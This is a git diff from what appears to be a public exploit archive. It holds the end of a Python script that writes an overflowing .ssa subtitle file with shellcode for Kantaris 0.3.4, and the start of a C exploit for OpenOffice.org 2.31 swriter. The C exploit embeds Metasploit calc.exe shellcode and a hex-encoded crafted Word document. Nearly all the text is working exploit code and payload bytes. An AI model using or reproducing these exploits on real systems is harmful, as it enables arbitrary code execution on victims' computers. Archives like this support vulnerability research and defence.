+"\x41\x30\x41\x35\x41\x55\x45\x55\x41\x35\x4f\x4f\x42\x4d\x4a\x46" + +"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36" +"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f" +"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d" + +"\x4a\x36\x42\x4f\x4c\x38\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d" +"\x4f\x4f\x42\x4d\x5a") + +bafer = '\x41' * 163868 + jmp + "\x90" * 32 + sc + +fileHandle = open ( 'film.ssa', 'w' ) + +fileHandle.write ( '[Script Info]\n') +fileHandle.write ( 'ScriptType: v4.00\n') 
+fileHandle.write ( 'Title: Kantaris 0.3.4 buffer-overflow\n')
+fileHandle.write ( 'Collisions: Normal\n\n')
+
+fileHandle.write ( '[V4 Styles]\n\n')
+fileHandle.write ( '[Events]\n')
+
+fileHandle.write ( 'Dialogue: '+ bafer)
+fileHandle.close()
+
+# milw0rm.com [2008-04-25]
diff --git a/platforms/windows/local/558.c b/platforms/windows/local/558.c
index 9e008ec5a..fe9efd5c2 100755
--- a/platforms/windows/local/558.c
+++ b/platforms/windows/local/558.c
@@ -114,6 +114,6 @@ argv[0]); printf("Exploit rar file %s has been generated!\n",argv[2]); fclose(di);
-}
-
-// milw0rm.com [2004-09-28]
+}
+
+// milw0rm.com [2004-09-28]
diff --git a/platforms/windows/local/5584.c b/platforms/windows/local/5584.c
index 6c7158690..a4f009de4 100755
--- a/platforms/windows/local/5584.c
+++ b/platforms/windows/local/5584.c
@@ -1,7368 +1,7368 @@ -/* - Open Office.org 2.31 swriter local code execution exploit. - This bug has been patched in OOo 2.4. - Spawns calc.exe if successful. - - Marsupilamipowa@hotmail.fr -*/ - -#include -#include -#include - -/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */ -unsigned char calc[] = -"\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xcc" -"\x35\x6a\xc8\x83\xeb\xfc\xe2\xf4\x30\xdd\x2e\xc8\xcc\x35\xe1\x8d" -"\xf0\xbe\x16\xcd\xb4\x34\x85\x43\x83\x2d\xe1\x97\xec\x34\x81\x81" -"\x47\x01\xe1\xc9\x22\x04\xaa\x51\x60\xb1\xaa\xbc\xcb\xf4\xa0\xc5" -"\xcd\xf7\x81\x3c\xf7\x61\x4e\xcc\xb9\xd0\xe1\x97\xe8\x34\x81\xae" -"\x47\x39\x21\x43\x93\x29\x6b\x23\x47\x29\xe1\xc9\x27\xbc\x36\xec" -"\xc8\xf6\x5b\x08\xa8\xbe\x2a\xf8\x49\xf5\x12\xc4\x47\x75\x66\x43" -"\xbc\x29\xc7\x43\xa4\x3d\x81\xc1\x47\xb5\xda\xc8\xcc\x35\xe1\xa0" -"\xf0\x6a\x5b\x3e\xac\x63\xe3\x30\x4f\xf5\x11\x98\xa4\x4b\xb2\x2a" -"\xbf\x5d\xf2\x36\x46\x3b\x3d\x37\x2b\x56\x0b\xa4\xaf\x1b\x0f\xb0" -"\xa9\x35\x6a\xc8"; - -char file_part0[]= -"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x3e\x00\x03\x00\xfe\xff\x09\x00" -"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00" -"\xcc\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\xce\x00\x00\x00" -"\x01\x00\x00\x00\xfe\xff\xff\xff\x00\x00\x00\x00\xdc\x00\x00\x00" -"\xcd\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\x32\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xec\xa5\xc1\x00\x35\x40\x09\x04\x00\x00\xf0\x12\xbf\x00\x00\x00" -"\x00\x00\x00\x30\x00\x00\x00\x00\x00\x06\x00\x00\x1a\x7c\x00\x00" -"\x0e\x00\x62\x6a\x62\x6a\xcf\x32\xcf\x32\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x04\x16\x00" -"\x29\x02\x01\x00\xad\x58\x00\x00\xad\x58\x00\x00\xdf\x73\x00\x00" -"\x00\x00\x00\x00\x3a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x0f\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x0f\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xff\xff\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x88\x00\x00\x00\x42\x00\x08\x03" 
-"\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x08\x03\x00\x00\x00\x00" -"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00" -"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x14\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x03\x00\x00\x00\x00" -"\x00\x00\x04\x56\x00\x00\x00\x00\x00\x00\x04\x56\x00\x00\x00\x00" -"\x00\x00\x04\x56\x00\x00\x38\x00\x00\x00\x3c\x56\x00\x00\x34\x00" -"\x00\x00\x70\x56\x00\x00\xdc\x01\x00\x00\x1c\x03\x00\x00\x00\x00" -"\x00\x00\xcb\x6b\x00\x00\xf2\x00\x00\x00\x58\x58\x00\x00\x00\x00" -"\x00\x00\x58\x58\x00\x00\x16\x00\x00\x00\x6e\x58\x00\x00\x00\x00" -"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00" -"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00" -"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x4a\x6b\x00\x00\x02\x00" -"\x00\x00\x4c\x6b\x00\x00\x00\x00\x00\x00\x4c\x6b\x00\x00\x00\x00" -"\x00\x00\x4c\x6b\x00\x00\x00\x00\x00\x00\x4c\x6b\x00\x00\x00\x00" -"\x00\x00\x4c\x6b\x00\x00\x00\x00\x00\x00\x4c\x6b\x00\x00\x24\x00" -"\x00\x00\xbd\x6c\x00\x00\x52\x02\x00\x00\x0f\x6f\x00\x00\x6e\x00" -"\x00\x00\x70\x6b\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00" -"\x00\x00\x00\x5e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00" -"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x00\x5e\x00\x00\x00\x00" -"\x00\x00\x00\x5e\x00\x00\x00\x00\x00\x00\x70\x6b\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00" -"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00" -"\x00\x00\x85\x6b\x00\x00\x16\x00\x00\x00\x82\x61\x00\x00\x00\x00" -"\x00\x00\x82\x61\x00\x00\x00\x00\x00\x00\x82\x61\x00\x00\x00\x00" -"\x00\x00\x00\x5e\x00\x00\xea\x01\x00\x00\x08\x03\x00\x00\x00\x00" -"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00" 
-"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x4a\x6b\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x61\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x5e\x00\x00\x00\x00\x00\x00\x4a\x6b\x00\x00\x00\x00" -"\x00\x00\x82\x61\x00\x00\xf8\x00\x56\x00\x82\x61\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7a\x62\x00\x00\x00\x00" -"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7a\x62\x00\x00\x00\x00" -"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x4c\x58\x00\x00\x0c\x00" -"\x00\x00\xf0\xaa\x92\x0f\x66\x1c\xc6\x01\x00\x00\x00\x00\x00\x00" -"\x00\x00\x04\x56\x00\x00\x00\x00\x00\x00\xea\x5f\x00\x00\x76\x00" -"\x00\x00\x7a\x62\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xce\x62\x00\x00\x7c\x08\x00\x00\x9b\x6b\x00\x00\x30\x00" -"\x00\x00\xcb\x6b\x00\x00\x00\x00\x00\x00\x7a\x62\x00\x00\x00\x00" -"\x00\x00\x7d\x6f\x00\x00\x00\x00\x00\x00\x60\x60\x00\x00\x00\x01" -"\x00\x00\x7d\x6f\x00\x00\x00\x00\x00\x00\x7a\x62\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x03\x00\x00\x00\x00" -"\x00\x00\x1c\x03\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00" -"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00" -"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x7a\x62\x00\x00\x14\x00\x00\x00\x7d\x6f\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00" -"\x00\x00\x8e\x62\x00\x00\x40\x00\x00\x00\x6e\x58\x00\x00\xf0\x01" -"\x00\x00\x5e\x5a\x00\x00\x62\x01\x00\x00\x82\x61\x00\x00\x00\x00" 
-"\x00\x00\xc0\x5b\x00\x00\x1c\x01\x00\x00\xdc\x5c\x00\x00\x24\x01" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00" -"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x70\x6b\x00\x00\x00\x00" -"\x00\x00\x70\x6b\x00\x00\x00\x00\x00\x00\x1c\x03\x00\x00\x00\x00" -"\x00\x00\x1c\x03\x00\x00\x84\x51\x00\x00\xa0\x54\x00\x00\x64\x01" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\x61\x00\x00\x22\x00" -"\x00\x00\x1c\x03\x00\x00\x00\x00\x00\x00\x1c\x03\x00\x00\x00\x00" -"\x00\x00\xa0\x54\x00\x00\x00\x00\x00\x00\x02\x00\x01\x01\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x3e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x4c\x45\x20\x4c\x49\x56\x52\x45\x54\x20\x44\x55\x20\x50\x52\x4f" -"\x50\x52\x49\x45\x54\x41\x49\x52\x45\x20\x44\x45\x20\x4c\x45\x56" -"\x52\x49\x45\x52\x20\x53\x50\x4f\x52\x54\x49\x46\x0d\x28\x43\x65" -"\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x20\x6e\x27\x65\x73\x74\x20" -"\x70\x61\x73\x20\x75\x6e\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74" -"\x20\x6d\x61\x69\x73\x20\x75\x6e\x20\x72\x65\x63\x75\x65\x69\x6c" -"\x20\x64\x65\x20\x63\x6f\x6e\x73\x65\x69\x6c\x73\x29\x0d\x4f\xf9" -"\x20\x76\x6f\x75\x73\x20\x61\x64\x72\x65\x73\x73\x65\x72\x20\x3f" -"\x0d\x49\x6c\x20\x66\x61\x75\x74\x20\x64\x27\x61\x62\x6f\x72\x64" -"\x20\xe9\x64\x75\x71\x75\x65\x72\x20\x76\x6f\x74\x72\x65\x20\x6a" -"\x65\x75\x6e\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\xe0\x20\x73" -"\x75\x69\x76\x72\x65\x20\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20" -"\x6a\x75\x73\x71\x75\x27\x61\x75\x20\x62\x6f\x75\x74\x20\x65\x74" -"\x20\xe0\x20\x74\x6f\x6c\xe9\x72\x65\x72\x20\x64\x65\x73\x20\x63" -"\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x73\x2e\x20\x50\x6f\x75\x72" -"\x20\x63\x65\x6c\x61\x20\x76\x6f\x75\x73\x20\x64\x69\x73\x70\x6f" -"\x73\x65\x7a\x20\x64\x27\x75\x6e\x20\x72\xe9\x73\x65\x61\x75\x20" -"\x64\x65\x20\x43\x6c\x75\x62\x73\x20\x64\x65\x20\x54\x72\x61\x76" -"\x61\x69\x6c\x20\x28\x63\x6c\x75\x62\x73\x20\x64\x65\x20\x63\x6f" -"\x75\x72\x73\x65\x20\x73\x75\x72\x20\x63\x79\x6e\x6f\x64\x72\x6f" -"\x6d\x65\x20\x28\x45\x2e\x4e\x2e\x43\x20\x6f\x75\x20\x49\x2e\x54" -"\x29\x20\x6f\x75\x20\x63\x6c\x75\x62\x73\x20\x64\x65\x20\x70\x6f" -"\x75\x72\x73\x75\x69\x74\x65\x20\xe0\x20\x76\x75\x65\x20\x73\x75" -"\x72\x20\x6c\x65\x75\x72\x72\x65\x20\x28\x50\x2e\x56\x2e\x4c\x2e" -"\x29\x20\x29\x20\x61\x67\x72\xe9\xe9\x73\x20\x70\x61\x72\x20\x6c" -"\x61\x20\x53\x6f\x63\x69\xe9\x74\xe9\x20\x43\x65\x6e\x74\x72\x61" -"\x6c\x65\x20\x43\x61\x6e\x69\x6e\x65\x20\x65\x74\x20\x71\x75\x69" 
-"\x20\x64\x69\x73\x70\x6f\x73\x65\x6e\x74\x20\x63\x68\x61\x63\x75" -"\x6e\x20\x64\x27\x75\x6e\x20\x70\xe9\x72\x69\x6d\xe8\x74\x72\x65" -"\x20\x64\x27\x61\x74\x74\x72\x69\x62\x75\x74\x69\x6f\x6e\x20\x70" -"\x6f\x75\x72\x20\x6c\x61\x20\x64\xe9\x6c\x69\x76\x72\x61\x6e\x63" -"\x65\x20\x64\x65\x73\x20\x42\x72\x65\x76\x65\x74\x73\x20\x64\x27" -"\x41\x70\x74\x69\x74\x75\x64\x65\x20\x61\x75\x78\x20\x43\x6f\x75" -"\x72\x73\x65\x73\x20\x28\xbd\x2e\x41\x2e\x43\x2e\x19\x20\x6f\x75" -"\x20\xe0\x20\x6c\x61\x20\x50\x6f\x75\x72\x73\x75\x69\x74\x65\x20" -"\xe0\x20\x56\x75\x65\x20\x28\x42\x2e\x50\x2e\x56\x2e\x29\x2e\x20" -"\x4c\x27\x61\x64\x72\x65\x73\x73\x65\x20\x70\x65\x75\x74\x20\x76" -"\x6f\x75\x73\x20\xea\x74\x72\x65\x20\x66\x6f\x75\x72\x6e\x69\x65" -"\x20\x70\x61\x72\x20\x6c\x61\x20\x53\x6f\x63\x69\xe9\x74\xe9\x20" -"\x43\x61\x6e\x69\x6e\x65\x20\x52\xe9\x67\x69\x6f\x6e\x61\x6c\x65" -"\x20\x6f\x75\x20\x76\x6f\x74\x72\x65\x20\x41\x73\x73\x6f\x63\x69" -"\x61\x74\x69\x6f\x6e\x20\x73\x70\xe9\x63\x69\x61\x6c\x69\x73\xe9" -"\x65\x20\x64\x65\x20\x52\x61\x63\x65\x2e\x0d\x53\x69\x20\x76\x6f" -"\x75\x73\x20\x61\x64\x68\xe9\x72\x65\x7a\x20\xe0\x20\x75\x6e\x20" -"\x63\x6c\x75\x62\x2c\x20\x76\x6f\x75\x73\x20\x72\x65\x63\x65\x76" -"\x72\x65\x7a\x20\x74\x6f\x75\x74\x65\x73\x20\x6c\x65\x73\x20\x69" -"\x6e\x66\x6f\x72\x6d\x61\x74\x69\x6f\x6e\x73\x20\x75\x74\x69\x6c" -"\x65\x73\x2e\x0d\x0d\x51\x75\x65\x6c\x6c\x65\x73\x20\xe9\x70\x72" -"\x65\x75\x76\x65\x73\x20\x65\x78\x69\x73\x74\x65\x6e\x74\x20\x3f" -"\x0d\x49\x6c\x20\x79\x20\x61\x20\x74\x72\x6f\x69\x73\x20\x73\x6f" -"\x72\x74\x65\x73\x20\x64\x27\xe9\x70\x72\x65\x75\x76\x65\x73\x20" -"\x3a\x0d\x0d\x31\x29\x20\x4c\x65\x73\x20\x45\x70\x72\x65\x75\x76" -"\x65\x73\x20\x4e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x73\x20\x73\x75" -"\x72\x20\x43\x79\x6e\x6f\x64\x72\x6f\x6d\x65\x20\x28\x45\x2e\x4e" -"\x2e\x43\x2e\x29\x2e\x0d\x42\x61\x70\x74\x69\x73\xe9\x65\x73\x20" -"\x63\x6f\x75\x72\x73\x65\x73\x20\x6f\x75\x20\x72\x61\x63\x69\x6e" 
-"\x67\x20\x64\x61\x6e\x73\x20\x6e\x6f\x74\x72\x65\x20\x6a\x61\x72" -"\x67\x6f\x6e\x20\x65\x6c\x6c\x65\x73\x20\x73\x65\x20\x64\xe9\x72" -"\x6f\x75\x6c\x65\x6e\x74\x20\x73\x75\x72\x20\x75\x6e\x20\x63\x79" -"\x6e\x6f\x64\x72\x6f\x6d\x65\x2c\x20\xe9\x74\x61\x6c\x6f\x6e\x6e" -"\xe9\x20\x70\x75\x69\x73\x20\x61\x67\x72\xe9\xe9\x20\x70\x61\x72" -"\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f\x6e\x20\x4e" -"\x61\x74\x69\x6f\x6e\x61\x6c\x65\x20\x64\x27\x55\x74\x69\x6c\x69" -"\x73\x61\x74\x69\x6f\x6e\x20\x64\x65\x73\x20\x4c\xe9\x76\x72\x69" -"\x65\x72\x73\x20\x64\x69\x74\x65\x22\x20\x43\x6f\x6d\x6d\x69\x73" -"\x73\x69\x6f\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x22\x2e\x0d" -"\x4c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x79\x20\x64\x69\x73" -"\x70\x75\x74\x65\x20\x64\x27\x61\x62\x6f\x72\x64\x20\x75\x6e\x65" -"\x20\x63\x6f\x75\x72\x73\x65\x20\x63\x6f\x6e\x74\x72\x65\x20\x6c" -"\x61\x20\x6d\x6f\x6e\x74\x72\x65\x20\x64\x69\x74\x65\x20\x64\x65" -"\x20\x71\x75\x61\x6c\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x2c\x20" -"\x61\x70\x70\x72\xe9\x63\x69\xe9\x65\x20\x70\x61\x72\x20\x72\x61" -"\x70\x70\x6f\x72\x74\x20\xe0\x20\x75\x6e\x65\x20\x76\x69\x74\x65" -"\x73\x73\x65\x20\x64\x65\x20\x72\xe9\x66\xe9\x72\x65\x6e\x63\x65" -"\x20\x28\x31\x30\x20\xe0\x20\x31\x35\x20\x6d\xe8\x74\x72\x65\x73" -"\x20\x70\x61\x72\x20\x73\x65\x63\x6f\x6e\x64\x65\x73\x29\x20\x64" -"\x69\x74\x65\x20\x74\x65\x6d\x70\x73\x20\x64\x65\x20\x62\x61\x73" -"\x65\x2e\x0d\x49\x6c\x20\x65\x73\x74\x20\x61\x6c\x6f\x72\x73\x20" -"\x63\x6c\x61\x73\x73\xe9\x20\x65\x6e\x20\x3a\x20\x49\x6e\x74\x65" -"\x72\x6e\x04\x74\x69\x6f\x6e\x61\x6c\x65\x2c\x20\x41\x2c\x20\x42" -"\x2c\x20\x43\x2c\x20\x44\x2e\x0d\x45\x6e\x73\x75\x69\x74\x65\x20" -"\x69\x6c\x20\x64\x69\x73\x70\x75\x74\x65\x20\x64\x65\x73\x20\x63" -"\x6f\x75\x72\x73\x65\x73\x20\xe0\x20\x6c\x61\x20\x70\x6c\x61\x63" -"\x65\x20\x6f\xf9\x20\x69\x6c\x20\x61\x66\x66\x72\x6f\x6e\x74\x65" -"\x20\x6c\x65\x73\x20\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x73" 
